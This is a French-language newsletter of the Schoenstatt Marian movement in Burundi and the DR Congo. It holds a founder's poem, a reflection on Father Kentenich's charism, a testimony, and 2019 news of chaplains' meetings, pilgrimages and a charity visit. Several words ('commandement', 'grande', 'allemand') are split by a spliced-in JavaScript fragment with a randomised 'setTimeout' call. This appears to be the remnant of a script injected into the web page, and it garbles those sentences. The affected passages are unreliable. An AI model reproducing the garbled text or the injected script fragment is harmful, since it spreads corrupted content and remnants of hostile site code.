« Dans l’Alliance d’Amour avec Marie, bâtissons une famille fidèle au charisme du Père »

Parole du Fondateur 

«Connais-tu le pays, si chaud, si familier,
que l’Amour éternel s’est construit :
où de nobles cœurs battent tendrement,
se supportent en joyeux esprit sacrifice ;
où, se secourant mutuellement, ils s’embrasent
et déferlent vers le Cœur de Dieu ;
où des torrents d’amour coulent en bouillonnant
pour étancher la soif d’amour du monde !
Ce pays merveilles, je le connais :
c’est le site ensoleillé par les splendeurs du Thabor,
où Notre-Dame Trois Fois Admirable
trône au milieu de ses enfants préférés,
et récompense fidèlement tous les dons d’amour
par la manifestation de sa gloire
et sa fidélité riche, incommensurable, infinie :
c’est ma patrie, c’est mon pays de Schoenstatt ! » (Vers le Ciel, paragraphe 600).

Réflexion :
Chère famille de Schoenstatt, c’est constamment que nous nous émerveillons de la présence agissante du Christ Ressuscité et de la bienveillance de sa chère Mère, notre Reine et Educatrice à partir du Sanctuaire. Cela suscite en nous un sentiment de fierté et de gratitude. Ici et partout ailleurs, les schoenstattiens exultent de joie en disant : Schoenstatt c’est ma famille. Schoenstatt c’est mon nom. Schoenstatt c’est ma vie. Schoenstatt c’est ma mission, etc. Nous sommes une famille du Père Kentenich et nous sommes détenteurs d’une mission qu’il nous a obtenue d’auprès de la Mère Trois Fois Admirable, une mission de raviver le feu d’amour au sein de l’Eglise. Cette mission se veut être à la fois commandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andement, exemple et signe d’une famille fidèle au charisme de notre Père. Nous sommes appelés à être les semeurs d’espérance dans un monde en proie aux défis de tout genre. Le charisme de notre Père doit se manifester en nous ses héritiers. Notre dévouement devra viser le plus haut degré et tous reconnaîtront par notre témoignage que nous sommes vraiment la famille du Père Kentenich. A partir du Sanctuaire, des torrents d’amour doivent continuer à couler parce que nos prières et nos sacrifices remplissent le capital de grâces par amour pour Schoenstatt. Notre contribution au sein de l’Eglise est d’une grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande importance. Le Saint Père, le Pape François vient de le prouver une fois de plus en nous accordant des indulgences plénières dans cette année où nous célébrons le Jubilé de 25 ans de notre Sanctuaire de Mont Sion Gikungu.  Quel cadeau inouï et quel grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and signe de la part de la Providence divine pour la famille et pour notre Eglise! Il convient de rappelle une chose : les dons sont des devoirs, disait le Père Kentenich. Redisons avec Saint Paul que Dieu nous a béni et comblé des bénédictions de l’Esprit, au ciel, dans le Christ (Ep 1,3). Vive Schoenstatt !                                                                  Père Longin Ntiranyibagira

Le charisme du Père pour l’Église de l’avenir 
Notre Père considérait l’œuvre de sa vie toujours comme un service pour l’Église. Notre préoccupation centrale est donc d’offrir sa personne et son charisme à l’Église. Au cours des trois dernières années de sa vie, notre Père parlait souvent de sa vision pour l’Église du futur, « l’Église sur la nouvelle rive », comme il l’appelle souvent. Ce qui est frappant, c’est qu’il le fait d’une manière très personnelle, dans une identification intérieure mûre avec cette Église. Déjà dans sa première allocution à la Famille de Schœnstatt après son retour de l’exil, il parla de l’amour pour l’Église et il continua à le faire jusqu’au jour de sa mort. Déjà pendant les années d’exil, il souhaitait expressément l’inscription sur sa pierre tombale : Dilexit ecclesiam, il a aimé l’Église. Cette Église, que notre Père aimait, n’est pas un pays lointain que nous n’avons pas encore conquis. C’est l’Église réelle dans laquelle notre charisme veut se déployer et devenir fécond. L’Église d’aujourd’hui est notre place et en elle, nous aspirons d’ores et déjà à être l’Église de l’avenir. L’Église de l’avenir dont notre Père rêvait est marquée par la solidarité et la responsabilité de tous, ainsi que par un enracinement dans son centre vivant, qui est Jésus Christ. (Conférence de Sr.M.Elisabeth, traduite de l’allemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and et adaptée en français par Sr.M.Virginie NDAYISABA).

Témoignage :
Alors que je fréquentais la quatrième année primaire, je perdis ma mère. Pour mon avenir, j’étais très préoccupée.  Aussitôt, le Bon Dieu m’ouvrit la porte : Schoenstatt.  Avec ma copine de classe, nous entrâmes dans la branche  des écolières : Abana b’umucoEnfants de la Lumière. En huitième année, ma copine se convertit à une religion Evangéliste. Elle m’y entraîna sans succès. Je ne voulais pas trahir maman Marie qui me prouve une affection maternelle incomparable et pourvoit à tous mes besoins. Je veux lui rester fidèle. Merci Maman Marie. (Jeunesse Féminine, Muramvya)


Les nouvelles de la Famille de Schoenstatt
Rencontre des Aumôniers  Dirigeants Diocésains et leurs collaborateurs (trices) 
Sous l’égide de l’Aumônier Dirigeant National et Régional le Père Longin Ntiranyibagira, les Aumôniers Dirigeants Diocésains et leurs collaborateurs du Burundi et de la R.D. Congo se sont réunis à Mont Sion Gikungu du 30 mai au 1 er juin 2019. Après le mot d’accueil de l’Aumônier National, les Aumôniers ont présenté chacun à son tour l’engagement de son Conseil Diocésain. L’approfondissement de la devise a été enrichi par la conférence du Père Claude Jeria avec le thème: Le charisme du Père Kentenich et  celle de la Sr. M. Virginie Ndayisaba avec le thème : La mission du Sanctuaire. Un jour, à Millwaukee, on posa la question au Père Kentenich:  ″Père, avec quels mots pouvez-vous vous définir?″ Il répondit : par trois mots. ″Père″, ″enfant″ et, ″Marie″. La mission de Schoenstatt est ainsi d’éduquer un homme-père, un homme-enfant du Dieu vivant  et un apôtre de Marie a indiqué le Père Claude.  Enfin, les Aumôniers ont confirmé les dates de la Semaine d’octobre à Mont Sion Gikungu, du jeudi 19 au samedi 21 septembre 2019.                               Fidèle Havyarimana                                                                                                                       
–Ermitage de la MTA à Kaburosha et pèlerinage des Pères de Schoenstatt
Le mardi 7/05/2019,  la Communauté des Pères de Schoenstatt  de Mont Sion Gikungu était en pèlerinage  au nouvel Ermitage de la MTA à Kaburosha, paroisse Cathédrale St. Paul d’Uvira en R.D. Congo.  7 prêtres diocésains d’Uvira étaient aussi présents ainsi que le Mwami (chef coutumier) de la chefferie des Bavira.  Le Père Jean Bernard Mazuru, Supérieur de la Communauté des Pères de Schoenstatt à Mont Sion Gikungu a  présidé la messe d’Action de grâce. Dans son homélie il a invité tous les chrétiens d’Uvira à prendre soin de cet Ermitage. A son tour,  le Mwami a rappelé que le nom de ″Kaburosha″ est pauvre de sens sémantique.  Il proposa plutôt le nom de Bula ou Munanira. Au nom du diocèse d’Uvira, M. l’Abbé Richard Bukenja proposa  aussi la révision de ce nom.  Enfin, tout le monde qui a pris la parole a imploré la volonté de Dieu afin que la Communauté des Pères de Schoenstatt s’implante dans le diocèse d’Uvira.                              Philippe Kitabu
— ”Sanctuaire de la Confiance” à Mutumba et pèlerinages de  mai 
Au cours de cette année  jubilaire, le ″Sanctuaire de la Confiance″ accueille biens des pèlerins. Rien que pour la première semaine de mai, le Sanctuaire  a accueilli  les étudiantes d’universités de Bujumbura, les travailleurs du Centre de Santé de Mutumba,  les chrétiens de la paroisse Buhonga, les schoenstattiens et les fidèles  de Gasi, paroisse Matara accompagnés par M. l’Abbé Pierre Nsengiyumva, les chrétiens  de la paroisse Kamenge, ceux de la paroisse Mutumba, les mères de Schoenstatt accompagnées par M. l’Abbé Siméon Nibaruta, Sr. M. Aline et Sr. M. Judith, enfin les membres d’ une chorale de la paroisse Cathédrale Regina Mundi à Bujumbura. Accueillir tout ce monde en une semaine  a fait sans doute la joie de la Reine de la Confiance qui fête avec nous 50 ans de son couronnement dans ce Sanctuaire.  Nous vous attendons surtout le samedi  21 septembre lors du pèlerinage national et régional de clôture de l’année jubilaire.           Sr. M. Alice Akimana                       
— Paroisse Kaburantwa –  Ouverture de l’année jubilaire de 25 ans de Schoenstatt
″Sous la protection de la Sainte Vierge Marie, nous voulons nous éduquer nous-mêmes pour devenir des saints″.
Telle est la devise qui nous guidera au cours de cette année jubilaire (1995-2020) dans la paroisse Kaburantwa, diocèse Bubanza. La messe d’ouverture, a été célébrée par M. l’Abbé Siméon Nibaruta, Aumônier  Dirigeant Diocésain.  Dans son homélie M. l’Abbé Siméon nous a appelés à  ″bâtir une famille fidèle au charisme du Père″.           Claver Nsabimana
–Branche des Hommes : Rencontres semestrielles
Le dimanche 5/5/2019, ceux appartenant à la Province Ecclésiastique de Bujumbura se sont réunis à Mont Sion Gikungu. Leur rencontre a été clôturée par une messe au Sanctuaire.  Du 1er au 2 juin, ce fut le tour de ceux de la Province Ecclésiastique de Gitega au Centre Lavigerie de Shatanya.  Afin qu’il y ait plus de participants, ceux de l’Archidiocèse de Gitega ont proposé que les prochaines rencontres  semestrielles soient organisées chaque diocèse à part et qu’elles soient organisées non plus par la Centrale mais par le comité diocésain de la branche.                 Fidele Havyarimana
 Pèlerinage des Mouvements d’Action Catholique  et clôture du mois marial de mai
Organisé par la CEDAL (Commission Episcopale Diocésaine pour l’Apostolat des Laïcs),  les Mouvements d’Action Catholique du Vicariat de la Mairie de Bujumbura ont effectué un pèlerinage de clôture du mois marial de mai à Mont Sion Gikungu le dimanche 27 mai 2019.  Une belle procession de prière a débuté à un kilomètre de Mont Sion Gikungu et une messe concélébrée  a été présidée par son Excellence Monseigneur Gervais Banshimiyubusa, Archevêque de Bujumbura. « Nous sommes enfants du même Père. Le commandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andement que nous avons hérité du Christ est celui de l’amour. Celui qui aime Jésus aime Son Père. Non plus, On ne peut pas aimer Jésus en haïssant ou en  détestant son prochain», a indiqué Mgr. l’Archevêque dans son homélie.                                       (https://www.peres-schoenstatt.org)            
— Acte de charité : OFS  rend visite  à une famille  dans la précarité
Dans l’apostolat de l’Action Carême Mont Sion Gikungu, le dimanche 5 mai, les familles du Cours  V de l’OFS Mont Sion Gikungu ont rendu visite à la famille Nkeshimana Fréderic et Minani Emmanueline, père et mère de 8 enfants sur la colline Ndagano, Zone Nyambuye, Commune Isare, Province Bujumbura. La mère de famille: Minani Emmanueline est paralysée depuis 10 ans de sorte qu’elle ne puisse tenir debout. Toutefois, la présence des visiteurs réconforte la famille malgré  la précarité matérielle dans laquelle elle vit. Madame Emmanueline a saisi l’opportunité pour exprimer sa joie et sa reconnaissance à l’endroit des visiteurs.                                                                              Xaverius Ndayisaba